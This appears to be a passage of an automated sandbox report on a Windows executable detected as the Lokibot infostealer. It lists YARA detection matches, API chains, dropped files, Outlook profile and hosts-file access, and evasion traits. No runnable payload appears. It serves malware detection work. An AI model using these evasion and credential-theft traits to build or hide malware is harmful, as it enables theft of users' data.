          Source: 1.0.kVijllv0Yl.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 1.0.kVijllv0Yl.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.kVijllv0Yl.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
          Source: 1.0.kVijllv0Yl.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 1.0.kVijllv0Yl.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.kVijllv0Yl.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
          Source: 1.0.kVijllv0Yl.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
          Source: 1.0.kVijllv0Yl.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 1.0.kVijllv0Yl.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.kVijllv0Yl.exe.1ade0000.3.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
          Source: 0.2.kVijllv0Yl.exe.1ade0000.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
          Source: 0.2.kVijllv0Yl.exe.1ade0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 0.2.kVijllv0Yl.exe.1ade0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.kVijllv0Yl.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
          Source: 1.0.kVijllv0Yl.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
          Source: 1.0.kVijllv0Yl.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 1.0.kVijllv0Yl.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.kVijllv0Yl.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
          Source: 1.0.kVijllv0Yl.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 1.0.kVijllv0Yl.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000000.350551294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
          Source: 00000001.00000000.350551294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 00000001.00000000.350551294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000000.346477507.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
          Source: 00000001.00000000.346477507.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 00000001.00000000.346477507.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000000.347539730.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
          Source: 00000001.00000000.347539730.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 00000001.00000000.347539730.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.361757781.000000001ADE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
          Source: 00000000.00000002.361757781.000000001ADE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
          Source: 00000000.00000002.361757781.000000001ADE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 00000000.00000002.361757781.000000001ADE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000000.349125284.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
          Source: 00000001.00000000.349125284.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 00000001.00000000.349125284.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.602834721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
          Source: 00000001.00000002.602834721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 00000001.00000002.602834721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeCode function: 0_2_00403225 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeCode function: 0_2_0040604C
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeCode function: 0_2_00404772
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeCode function: 0_2_021B0A17
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeCode function: 1_2_0040549C
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeCode function: 1_2_004029D4
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeCode function: String function: 0041219C appears 45 times
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeCode function: String function: 00405B6F appears 42 times
          Source: kVijllv0Yl.exe, 00000000.00000003.345017997.000000001B0CF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs kVijllv0Yl.exe
          Source: kVijllv0Yl.exe, 00000000.00000003.345626698.000000001AF36000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs kVijllv0Yl.exe
          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\nsg69F4.tmp\xfmkprutvpn.dll 2F51361FFE7DC60A4088469A27E570F22CF655E87720D26626B4E257492739E9
          Source: kVijllv0Yl.exeVirustotal: Detection: 40%
          Source: kVijllv0Yl.exeReversingLabs: Detection: 47%
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeFile read: C:\Users\user\Desktop\kVijllv0Yl.exeJump to behavior
          Source: kVijllv0Yl.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Users\user\Desktop\kVijllv0Yl.exe "C:\Users\user\Desktop\kVijllv0Yl.exe"
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeProcess created: C:\Users\user\Desktop\kVijllv0Yl.exe "C:\Users\user\Desktop\kVijllv0Yl.exe"
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeProcess created: C:\Users\user\Desktop\kVijllv0Yl.exe "C:\Users\user\Desktop\kVijllv0Yl.exe"
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeCode function: 1_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\CryptoJump to behavior
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeFile created: C:\Users\user\AppData\Local\Temp\nsg69F2.tmpJump to behavior
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/6@35/2
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeCode function: 0_2_00402012 CoCreateInstance,MultiByteToWideChar,
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeCode function: 0_2_00404275 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeMutant created: \Sessions\1\BaseNamedObjects\8F9C4E9C79A3B52B3F739430
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook
          Source: Binary string: wntdll.pdbUGP source: kVijllv0Yl.exe, 00000000.00000003.343540799.000000001AE20000.00000004.00000800.00020000.00000000.sdmp, kVijllv0Yl.exe, 00000000.00000003.341251965.000000001AFB0000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: kVijllv0Yl.exe, 00000000.00000003.343540799.000000001AE20000.00000004.00000800.00020000.00000000.sdmp, kVijllv0Yl.exe, 00000000.00000003.341251965.000000001AFB0000.00000004.00000800.00020000.00000000.sdmp

          Data Obfuscation

          barindex
          Yara detected aPLib compressed binary
          Source: Yara matchFile source: 0.2.kVijllv0Yl.exe.1ade0000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.kVijllv0Yl.exe.400000.9.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.kVijllv0Yl.exe.400000.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.kVijllv0Yl.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.kVijllv0Yl.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.kVijllv0Yl.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.kVijllv0Yl.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.kVijllv0Yl.exe.400000.7.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.kVijllv0Yl.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.kVijllv0Yl.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.kVijllv0Yl.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.kVijllv0Yl.exe.1ade0000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.kVijllv0Yl.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.kVijllv0Yl.exe.400000.9.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000001.00000000.350551294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.346477507.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.347539730.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.361757781.000000001ADE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.349125284.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.602834721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: kVijllv0Yl.exe PID: 2312, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: kVijllv0Yl.exe PID: 1292, type: MEMORYSTR
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeCode function: 1_2_00402AC0 push eax; ret
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeCode function: 1_2_00402AC0 push eax; ret
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeCode function: 0_2_00405DA3 GetModuleHandleA,LoadLibraryA,GetProcAddress,
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeFile created: C:\Users\user\AppData\Local\Temp\nsg69F4.tmp\xfmkprutvpn.dllJump to dropped file
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeProcess information set: NOGPFAULTERRORBOX

          Malware Analysis System Evasion

          barindex
          Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcess
          Source: C:\Users\user\Desktop\kVijllv0Yl.exe TID: 4216Thread sleep time: -240000s >= -30000s
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeCode function: 0_2_00405D7C FindFirstFileA,FindClose,
